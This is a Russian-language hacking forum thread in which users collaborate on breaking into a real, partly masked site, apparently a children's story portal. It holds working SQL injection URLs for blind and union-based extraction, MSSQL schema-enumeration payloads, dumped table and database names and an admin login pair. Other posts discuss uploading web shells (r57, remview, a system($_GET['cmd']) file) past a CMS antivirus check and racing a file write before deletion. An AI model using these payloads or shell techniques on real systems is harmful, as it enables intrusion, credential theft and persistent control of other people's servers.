Старый 11.01.2011, 00:10   #751
rsaReliableS
 
Регистрация: 29.07.2010
Сообщений: 36
Репутация: 7
По умолчанию

Код:
http://story.***.ru/writing.php?gid=35&etap=2+order+by+2 - ok
http://story.***.ru/writing.php?gid=35&etap=2+union+select+1,2 - err
думаю блинд:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=3 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=4 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=5 - err
но:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+5=5 - ok
не могу понять, что ни так

Последний раз редактировалось Twost; 16.05.2013 в 08:42..
rsaReliableS вне форума   Ответить с цитированием
Старый 11.01.2011, 01:18   #752
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Как залить шелл в дле 5.7 ? о_О
Залить .htaccess и шелл получается, вот только антивирус не находит... Шелл старый и на других сайтах его находит. Только на 2 левых файла что-то ругается.... Нагуглить ничего не получилось =(
M1lten вне форума   Ответить с цитированием
Старый 11.01.2011, 01:38   #753
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от rsaReliableS Посмотреть сообщение
Код:
http://story.***.ru/writing.php?gid=35&etap=2+order+by+2 - ok
http://story.***.ru/writing.php?gid=35&etap=2+union+select+1,2 - err
думаю блинд:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=3 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=4 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=5 - err
но:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+5=5 - ok
не пому понять, что ни так
Наверное потому, что там PostgreSQL

http://story.***.ru/writing.php?gid=35&etap=2+and+current_user=current _user--+
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.

Последний раз редактировалось Twost; 16.05.2013 в 08:43..
m0Hze вне форума   Ответить с цитированием
Старый 11.01.2011, 01:58   #754
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от rsaReliableS Посмотреть сообщение
Код:
http://story.childfest.ru/writing.php?gid=35&etap=2+order+by+2 - ok
http://story.***.ru/writing.php?gid=35&etap=2+union+select+1,2 - err
думаю блинд:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=3 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=4 - err
http://story.***.ru/writing.php?gid=35&etap=2+and+substring(@@version,1,1)=5 - err
но:
Код:
http://story.***.ru/writing.php?gid=35&etap=2+and+5=5 - ok
не пому понять, что ни так
Копаем, находим скулю с выводом.
http://story.***.ru/miniforum.php?gid=-35'+union+select+1,2,3,4,5--+
Тащим данные
Таблицы
Код:
dtproperties

write_bags

write_crime

write_global

write_groups

write_grusr

write_messages

write_miniforum

write_msgsys

write_news

write_users

write_vote
Админ

Код:
orex:orex
+никак не смог организовать конкатенацию, мб руки кривые совсем стали, но || не сработало, хотя встроеные ф-ции говоярт что это PG.

++Незнал, но у Postgre, есть зависимости к конкатенации. В каких то версиях(новых?), вполне себе || работает, а вот в этой конкатенация идет через "+", и он адекватно воспринимает хексы (0х). Тобишь, http://story.***.ru/miniforum.php?gid=-35'+union+select+1,2,login%2Bpass,null,null+from+w rite_users--+
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.

Последний раз редактировалось Twost; 16.05.2013 в 08:43..
m0Hze вне форума   Ответить с цитированием
Старый 11.01.2011, 02:01   #755
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

rsaReliableS
http://story.***.ru/writing.php?gid=-1+union+all+select+null,null,null,null,null,system _user,null,null,null,null,null,null,null,null,null ,null-- 1
M1lten
Используй силу хакерскую догадку,залей другой шелл,или просто код,который антивирь должен запалить.

Последний раз редактировалось Twost; 16.05.2013 в 08:43..
~d0s~ вне форума   Ответить с цитированием
Старый 11.01.2011, 02:37   #756
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

~d0s~, да вот как раз и пробую... И шеллы пытался найти ранее 2007г и просто файл с system($_GET['cmd']) и т.д и т.п. но пока безуспешно =( Может кто подкинет какойнить старинный и пасящийся шелл?) Хотя итак уже кучю перепробовал...
M1lten вне форума   Ответить с цитированием
Старый 11.01.2011, 15:29   #757
FIXER
 
Аватар для FIXER
 
Регистрация: 06.07.2010
Сообщений: 219
Репутация: 51
По умолчанию

2M1lten remview или r57 пробуй
==
вот с выводом в writing.php ~'write_msgsys'~
Код:
http://story.***.ru/writing.php?gid=-1%20UNION%20ALL%20SELECT%20null,null,null,null,null,(SELECT%20distinct%20TOP%201%20char(126)%2bchar(39)%2bcast(name%20as%20nvarchar(4000))%2bchar(39)%2bchar(126)%20FROM%20sysobjects%20where%20id=(SELECT%20TOP%201%20id%20FROM%20(SELECT%20distinct%20TOP%209%20id%20FROM%20sysobjects%20where%20xtype=char(85)%20ORDER%20BY%20id%20ASC)%20sq%20ORDER%20BY%20id%20DESC)),null,null,null,null,null,null,null,null,null,null--
Код:
http://story.***.ru/writing.php?gid=-999.9%20UNION%20ALL%20SELECT%20null,null,null,null,null,char(126)%2bchar(39)%2bcast(user%20as%20nvarchar(4000))%2bchar(39)%2bchar(126),null,null,null,null,null,null,null,null,null,null--
Data Bases:
Цитата:
master
tempdb
model
msdb
acm
doc8
dvpion
news
virtual
interkons
docentr
bsn
vsh
interguru
childfest
maps
story
pedsovet

Последний раз редактировалось Twost; 16.05.2013 в 08:44..
FIXER вне форума   Ответить с цитированием
Старый 11.01.2011, 22:17   #758
M1lten
 
Регистрация: 02.12.2010
Сообщений: 40
Репутация: -1
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
2M1lten remview или r57 пробуй
Пробовал, увы не палит =( В дле подних версиях, при проверки антивирусом, он выводит все файлы, и показует типо доверия) А тут он сцук только выводит( И те не мои и не шеллы) И что за код хз) Хотя ща скачаю 5.7 мож они там по дефолту есть и их мона залить и допистаь шелл))
M1lten вне форума   Ответить с цитированием
Старый 13.01.2011, 20:42   #759
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Имеется часть скрипта:
$pishem контролируется, $MY - тоже, однако не может включать в себя спец-символы, только "-_.a-z0-9"
PHP код:
    $fh fopen($MY'w') or die("can't open file");
    
fwrite($fh$pishem);
    
fclose($fh);
//...// тут 10 строк работы с файлом, обработка массива, есть preg_replace
    
unlink($MY); 
Я так понимаю, даже если файл набить разным мусором, все-равно php слишком быстро дойдет до анлинка?
Может есть еще варианты?
SynQ вне форума   Ответить с цитированием
Старый 13.01.2011, 20:58   #760
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
Имеется часть скрипта:
$pishem контролируется, $MY - тоже, однако не может включать в себя спец-символы, только "-_.a-z0-9"
PHP код:
    $fh fopen($MY'w') or die("can't open file");
    
fwrite($fh$pishem);
    
fclose($fh);
//...// тут 10 строк работы с файлом, обработка массива, есть preg_replace
    
unlink($MY); 
Я так понимаю, даже если файл набить разным мусором, все-равно php слишком быстро дойдет до анлинка?
Может есть еще варианты?
Показать 10 пропущенных строк.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot